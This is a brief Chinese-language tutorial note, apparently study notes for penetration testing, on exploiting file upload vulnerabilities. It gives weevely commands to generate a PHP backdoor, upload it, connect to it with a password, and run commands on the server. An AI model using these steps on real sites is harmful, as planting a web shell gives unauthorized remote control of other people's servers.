漏洞发掘
文件上传漏洞
- 是一种简单的漏洞类型
- 允许用户上传可执行文件,如php
上传一个php shell或者backdoor,例如weevely。(生成php脚本) 1、生成backdoor
weevely generate [password] [file name]
- password是我们用的,自定义
- file name是自定义路径
2、上传生成的文件
3、链接
weevely [url to file] [password]
连接到脚本后,输入的脚本命令都可以执行,比如:pwd等,自己脑补
4、使用 连接后可以直接输入help查看可以进行哪些操作
help
